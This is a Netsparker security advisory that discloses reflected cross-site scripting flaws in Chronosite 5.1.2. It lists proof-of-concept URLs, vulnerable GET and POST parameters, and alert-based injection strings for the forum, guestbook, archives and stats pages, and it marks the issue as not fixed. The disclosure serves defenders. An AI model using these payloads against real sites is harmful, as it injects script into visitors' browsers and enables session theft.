Information
--------------------
Advisory by Netsparker
Name: Multiple Reflected XSS Vulnerabilities in Chronosite
Affected Software : Chronosite
Affected Versions: 5.1.2
Vendor Homepage : http://www.chronosite.org/  
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Not Fixed
Netsparker Advisory Reference : NS-17-027

Technical Details
--------------------

Proof of Concept URLs for XSS vulnerabilities in Chronosite 5.1.2;

Url /chronosite_512/annuaires/faq_01.php
Parameter Name marque
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0041A3)</scRipt>

Url /chronosite_512/archives.php
Parameter Name actif
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002E78)</scRipt>

Url /chronosite_512/archives.php
Parameter Name theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002F36)</scRipt>

Url /chronosite_512/archives.php
Parameter Name lien_interne
Parameter Type POST
Attack Pattern /"onload="alert(9)" x

Url /chronosite_512/archives.php
Parameter Name ident
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002F38)</scRipt>

Url /chronosite_512/archives.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0031CE)</scRipt>

Url /chronosite_512/forum.php
Parameter Name response_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002070)</scRipt>

Url /chronosite_512/forum.php
Parameter Name ajoute_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00206C)</scRipt>

Url /chronosite_512/forum.php
Parameter Name num_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001EF2)</scRipt>

Url /chronosite_512/forum.php
Parameter Name cherche
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url /chronosite_512/forum.php
Parameter Name response
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00206E)</scRipt>

Url /chronosite_512/forum.php
Parameter Name publique
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00218E)</scRipt>

Url /chronosite_512/forum.php
Parameter Name annule
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00218C)</scRipt>

Url /chronosite_512/index.php
Parameter Name lien_interne
Parameter Type POST
Attack Pattern /"onload="alert(9)" x

Url /chronosite_512/index.php
Parameter Name num_ero
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001929)</scRipt>

Url /chronosite_512/index.php
Parameter Name affiche_infos
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019F1)</scRipt>

Url /chronosite_512/index.php
Parameter Name actif
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001989)</scRipt>

Url /chronosite_512/index.php
Parameter Name ident
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019EB)</scRipt>

Url /chronosite_512/index.php
Parameter Name decale
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00198B)</scRipt>

Url /chronosite_512/index.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019EF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name ajoute_un_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0025D1)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name kestion
Parameter Type POST
Attack Pattern </title></textarea></noscRipt><scRipt>alert(9)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0025CF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name annule
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00274B)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name cherche
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024AF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name email
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024B3)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name pseudo
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024B1)</scRipt>

Url /chronosite_512/stats/
Parameter Name ana
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0039E7)</scRipt>

Url /chronosite_512/stats/
Parameter Name value
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0038CB)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name tri_moi
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x005173)</scRipt>

Url /chronosite_512/stats/admin.php?ana=Visiteurs&ope=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x004D65)%3C/scRipt%3E&tri_ann=
Parameter Name ope
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x004D65)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name sit
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x004F69)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name ope
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x005231)</scRipt>

Url /chronosite_512/stats/index.php?ana=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x003BBF)%3C/scRipt%3E
Parameter Name ana
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x003BBF)</scRipt>

Url /chronosite_512/stats/index.php?ana=3
Parameter Name value
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x003BC1)</scRipt>

Url /chronosite_512/stats/index.php?ana=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00386C)%3C/scRipt%3E
Parameter Name ana
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00386C)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
02 Feb 2017 - Issue reported.
12 Jun 2017 - Advisory released.

Solution
--------------------
-

Credits & Authors
--------------------
These issues have been discovered by Enes Aslanbakan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.